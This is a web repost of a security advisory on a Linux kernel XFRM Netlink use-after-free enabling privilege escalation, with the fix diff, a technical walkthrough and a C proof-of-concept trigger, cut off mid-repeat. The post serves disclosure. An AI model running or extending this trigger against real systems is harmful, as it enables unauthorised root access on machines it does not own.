{"id":10588,"date":"2017-11-23T14:19:08","date_gmt":"2017-11-23T22:19:08","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/11\/23\/news-4360\/"},"modified":"2017-11-23T14:19:08","modified_gmt":"2017-11-23T22:19:08","slug":"news-4360","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/11\/23\/news-4360\/","title":{"rendered":"SSD Advisory \u2013 Linux Kernel XFRM Privilege Escalation"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Thu, 23 Nov 2017 06:59:02 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes a use-after-free vulnerability found in the Linux kernel that can lead to privilege escalation. The vulnerability was found in the Netlink socket subsystem &#8211; XFRM.<\/p>\n<p>Netlink is used to transfer information between the kernel and user-space processes. 
It consists of a standard sockets-based interface for user space processes and an internal kernel API for kernel modules.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Mohamed Ghannam, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> The vulnerability has been addressed as part of the 1137b5e (&#8220;ipsec: Fix aborted xfrm policy dump crash&#8221;) patch:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a17495be4775925954773\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\">net\/xfrm\/xfrm_user.c<\/span>  \t\t\t<\/p>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">  
@@ -1693,32 +1693,34 @@ static int dump_one_policy(struct xfrm_policy *xp, int dir, int count, void *ptr     static int xfrm_dump_policy_done(struct netlink_callback *cb)   {  &#8211;\tstruct xfrm_policy_walk *walk = (struct xfrm_policy_walk *) &amp;cb-&gt;args[1];  +\tstruct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb-&gt;args;   \tstruct net *net = sock_net(cb-&gt;skb-&gt;sk);      \txfrm_policy_walk_done(walk, net);   \treturn 0;   }     +static int xfrm_dump_policy_start(struct netlink_callback *cb)  +{  +\tstruct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb-&gt;args;  +  +\tBUILD_BUG_ON(sizeof(*walk) &gt; sizeof(cb-&gt;args));  +  +\txfrm_policy_walk_init(walk, XFRM_POLICY_TYPE_ANY);  +\treturn 0;  +}  +   static int xfrm_dump_policy(struct sk_buff *skb, struct netlink_callback *cb)   {   \tstruct net *net = sock_net(skb-&gt;sk);  &#8211;\tstruct xfrm_policy_walk *walk = (struct xfrm_policy_walk *) &amp;cb-&gt;args[1];  +\tstruct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb-&gt;args;   \tstruct xfrm_dump_info info;     &#8211;\tBUILD_BUG_ON(sizeof(struct xfrm_policy_walk) &gt;  &#8211;\t\t     sizeof(cb-&gt;args) &#8211; sizeof(cb-&gt;args[0]));  &#8211;   \tinfo.in_skb = cb-&gt;skb;   \tinfo.out_skb = skb;   \tinfo.nlmsg_seq = cb-&gt;nlh-&gt;nlmsg_seq;   \tinfo.nlmsg_flags = NLM_F_MULTI;     &#8211;\tif (!cb-&gt;args[0]) {  &#8211;\t\tcb-&gt;args[0] = 1;  &#8211;\t\txfrm_policy_walk_init(walk, XFRM_POLICY_TYPE_ANY);  &#8211;\t}  &#8211;   \t(void) xfrm_policy_walk(net, walk, dump_one_policy, &amp;info);      \treturn skb-&gt;len;   @@ -2474,6 +2476,7 @@ static const struct nla_policy xfrma_spd_policy[XFRMA_SPD_MAX+1] = {      static const struct xfrm_link {   \tint (*doit)(struct sk_buff *, struct nlmsghdr *, struct nlattr **);  +\tint (*start)(struct netlink_callback *);   \tint (*dump)(struct sk_buff *, struct netlink_callback *);   \tint (*done)(struct netlink_callback *);   \tconst struct nla_policy *nla_pol;   
@@ -2487,6 +2490,7 @@ static const struct xfrm_link {   \t[XFRM_MSG_NEWPOLICY   &#8211; XFRM_MSG_BASE] = { .doit = xfrm_add_policy    },   \t[XFRM_MSG_DELPOLICY   &#8211; XFRM_MSG_BASE] = { .doit = xfrm_get_policy    },   \t[XFRM_MSG_GETPOLICY   &#8211; XFRM_MSG_BASE] = { .doit = xfrm_get_policy,  +\t\t\t\t\t\t   .start = xfrm_dump_policy_start,   \t\t\t\t\t\t   .dump = xfrm_dump_policy,   \t\t\t\t\t\t   .done = xfrm_dump_policy_done },   \t[XFRM_MSG_ALLOCSPI    &#8211; XFRM_MSG_BASE] = { .doit = xfrm_alloc_userspi },   
@@ -2539,6 +2543,7 @@ static int xfrm_user_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh,      \t\t{   \t\t\tstruct netlink_dump_control c = {  +\t\t\t\t.start = link-&gt;start,   \t\t\t\t.dump = link-&gt;dump,   \t\t\t\t.done = link-&gt;done,   \t\t\t};<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p><span id=\"more-3535\"><\/span><\/p>\n<p><strong>Vulnerability details<\/strong><br \/> An unprivileged user can change the value of sk->sk_rcvbuf on an XFRM Netlink socket (sk == struct sock object).<\/p>\n<p>The value can be changed within a specific range via setsockopt(SO_RCVBUF). sk_rcvbuf is the total number of bytes of a buffer receiving data via recvmsg\/recv\/read.<\/p>\n<p>The sk_rcvbuf value is how many bytes the kernel should allocate for the skb (struct sk_buff objects).<\/p>\n<p>skb->truesize is a variable which keeps track of how many bytes of memory are consumed. In order to manage memory and not waste it, the kernel can handle the skb size at run time.<\/p>\n<p>For example, if we allocate a large socket buffer (skb) and we only receive a 1-byte packet, the kernel will adjust this by calling skb_set_owner_r.<\/p>\n<p>By calling skb_set_owner_r, sk->sk_rmem_alloc (which refers to the atomic variable sk->sk_backlog.rmem_alloc) is modified.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux1.jpg\" data-slb-active=\"1\" data-slb-asset=\"1368476763\" data-slb-internal=\"0\" data-slb-group=\"3535\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux1-300x30.jpg\" alt=\"\" width=\"300\" height=\"30\" class=\"alignnone size-medium wp-image-3536\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux1-300x30.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux1-768x76.jpg 768w, 
https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux1-1024x101.jpg 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux1.jpg 1511w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>When we create an XFRM netlink socket, xfrm_dump_policy is called; when we close the socket, xfrm_dump_policy_done is called.<\/p>\n<p>xfrm_dump_policy_done is called whenever cb_running for the netlink_sock object is true.<\/p>\n<p>xfrm_dump_policy_done tries to clean up an xfrm walk entry which is managed by the netlink_callback object.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux2.jpg\" data-slb-active=\"1\" data-slb-asset=\"994561489\" data-slb-internal=\"0\" data-slb-group=\"3535\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux2-300x66.jpg\" alt=\"\" width=\"300\" height=\"66\" class=\"alignnone size-medium wp-image-3537\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux2-300x66.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux2-768x168.jpg 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux2-1024x225.jpg 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux2.jpg 1527w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>When netlink_skb_set_owner_r is called (like skb_set_owner_r), it updates sk_rmem_alloc.<\/p>\n<p>netlink_dump():<br \/> <a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux3.jpg\" data-slb-active=\"1\" data-slb-asset=\"2090948629\" data-slb-internal=\"0\" data-slb-group=\"3535\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux3-300x25.jpg\" alt=\"\" width=\"300\" height=\"25\" class=\"alignnone size-medium wp-image-3538\" 
srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux3-300x25.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux3-768x64.jpg 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux3-1024x86.jpg 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux3.jpg 1517w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>In the above snippet we can see that the netlink_dump() check fails when sk->sk_rcvbuf is smaller than sk_rmem_alloc (notice that we can control sk->sk_rcvbuf via setsockopt).<\/p>\n<p>When this condition fails, it jumps to the end of the function and quits with failure, and the value of cb_running is not changed to false.<\/p>\n<p>nlk->cb_running is true, thus xfrm_dump_policy_done() is called.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux4.jpg\" data-slb-active=\"1\" data-slb-asset=\"1067344408\" data-slb-internal=\"0\" data-slb-group=\"3535\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux4-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" class=\"alignnone size-medium wp-image-3539\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux4-300x124.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux4-768x318.jpg 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux4-1024x424.jpg 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux4.jpg 1320w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>nlk->cb.done points to xfrm_dump_policy_done. It is worth noting that this function handles a doubly linked list, so if we can tweak this vulnerability to reference a controlled buffer, we could have a read\/write what\/where primitive.<\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p>The following proof of concept is for Ubuntu 
17.04.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a17495be4781046175041\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">
#define _GNU_SOURCE
#include &lt;string.h&gt;
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;asm\/types.h&gt;
#include &lt;sys\/socket.h&gt;
#include &lt;netinet\/in.h&gt;
#include &lt;arpa\/inet.h&gt;
#include &lt;linux\/netlink.h&gt;
#include &lt;linux\/xfrm.h&gt;
#include &lt;sched.h&gt;
#include &lt;unistd.h&gt;

#define BUFSIZE 2048


int fd;
struct sockaddr_nl addr;

struct msg_policy {
    struct nlmsghdr msg;
    char buf[BUFSIZE];
};

void create_nl_socket(void)
{
    fd = socket(PF_NETLINK,SOCK_RAW,NETLINK_XFRM);
    memset(&amp;addr,0,sizeof(struct sockaddr_nl));
    addr.nl_family = AF_NETLINK;
    addr.nl_pid = 0; \/* packet goes into the kernel *\/
    addr.nl_groups = XFRMNLGRP_NONE; \/* no need for multicast group *\/

}

void do_setsockopt(void)
{
    int var =0x100;

    \/* level 1 is SOL_SOCKET; this sets sk-&gt;sk_rcvbuf as described above *\/
    setsockopt(fd,1,SO_RCVBUF,&amp;var,sizeof(int));
}

struct msg_policy *init_policy_dump(int size)
{
    struct msg_policy *r;

    r = malloc(sizeof(struct msg_policy));
    if(r == NULL) {
        perror(\"malloc\");
        exit(-1);
    }
    memset(r,0,sizeof(struct msg_policy));

    r-&gt;msg.nlmsg_len = 0x10;
    r-&gt;msg.nlmsg_type = XFRM_MSG_GETPOLICY;
    r-&gt;msg.nlmsg_flags = NLM_F_MATCH | NLM_F_MULTI |  NLM_F_REQUEST;
    r-&gt;msg.nlmsg_seq = 0x1;
    r-&gt;msg.nlmsg_pid = 2;
    return r;

}
int send_msg(int fd,struct nlmsghdr *msg)
{
    int err;
    err = sendto(fd,(void *)msg,msg-&gt;nlmsg_len,0,(struct sockaddr*)&amp;addr,sizeof(struct sockaddr_nl));
    if (err &lt; 0) {
        perror(\"sendto\");
        return -1;
    }
    return 0;

}

void create_ns(void)
{
    if(unshare(CLONE_NEWUSER) != 0) {
        perror(\"unshare(CLONE_NEWUSER)\");
        exit(1);
    }
    if(unshare(CLONE_NEWNET) != 0) {
        perror(\"unshare(CLONE_NEWNET)\");
        exit(2);
    }
}
int main(int argc,char **argv)
{
    struct msg_policy *p;
    create_ns();

    create_nl_socket();
    p = init_policy_dump(100);
    do_setsockopt();
    send_msg(fd,&amp;p-&gt;msg);
    p = init_policy_dump(1000);
    send_msg(fd,&amp;p-&gt;msg);
    return 0;
}<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-1\"><span class=\"crayon-p\">#define _GNU_SOURCE<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-2\"><span class=\"crayon-p\">#include &lt;string.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5a17495be4781046175041-3\"><span class=\"crayon-p\">#include &lt;stdio.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-4\"><span class=\"crayon-p\">#include &lt;stdlib.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-5\"><span class=\"crayon-p\">#include &lt;asm\/types.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-6\"><span class=\"crayon-p\">#include &lt;sys\/socket.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-7\"><span class=\"crayon-p\">#include &lt;netinet\/in.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-8\"><span class=\"crayon-p\">#include &lt;arpa\/inet.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-9\"><span class=\"crayon-p\">#include &lt;linux\/netlink.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-10\"><span class=\"crayon-p\">#include &lt;linux\/xfrm.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-11\"><span class=\"crayon-p\">#include &lt;sched.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-12\"><span class=\"crayon-p\">#include &lt;unistd.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-14\"><span class=\"crayon-p\">#define BUFSIZE 2048<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-15\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-16\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-17\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-18\"><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sockaddr_nl <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-19\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-20\"><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">msg_policy<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">nlmsghdr <\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">BUFSIZE<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-23\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-24\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-25\"><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">create_nl_socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span 
class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-26\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">PF_NETLINK<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">SOCK_RAW<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">NETLINK_XFRM<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sockaddr_nl<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nl_family<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AF_NETLINK<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-5a17495be4781046175041-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nl_pid<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/* packet goes into the kernel *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nl_groups<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">XFRMNLGRP_NONE<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/* no need for multicast group *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-32\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-33\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-34\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-35\"><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">do_setsockopt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-36\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0x100<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-38\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">setsockopt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">SO_RCVBUF<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-40\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-41\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-42\"><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">msg_policy *<\/span><span class=\"crayon-e\">init_policy_dump<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-43\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">struct<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-e\">msg_policy *<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-45\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">malloc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">msg_policy<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-47\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">perror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;malloc&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span 
class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-50\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-51\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">msg_policy<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line 